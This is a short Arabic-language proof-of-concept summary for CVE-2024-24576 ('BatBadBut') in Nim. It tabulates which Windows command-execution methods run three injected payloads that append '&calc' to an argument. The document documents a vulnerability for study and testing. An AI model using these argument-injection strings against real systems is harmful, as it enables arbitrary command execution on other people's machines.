
PoC لثغرة CVE-2024-24576 في Nim Lang
استكشاف ثغرات حقن الأوامر في ويندوز باستخدام Nim
فيما يلي جدول مُلخّص يستند إلى نتائج الاختبارات من تجارب كود Nim مع حمولات مختلفة:
| الحمولة | execProcess_NoQuoteShell | execProcess_QuoteShell | execShellCmd |
|---|---|---|---|
nim &calc | لم ينجح | لم ينجح | ناجح |
nim" &calc | ناجح | لم ينجح | لم ينجح |
%CMDCMDLINE:~-1%&calc | ناجح | ناجح | ناجح |
"ناجح" تعني أن الحمولة نُفِّذت بطريقة قد تستغل ثغرة BatBadBut، مما يُظهر السلوك الدقيق لطرق تنفيذ الأوامر في Nim استجابةً لأنواع مختلفة من المُدخلات.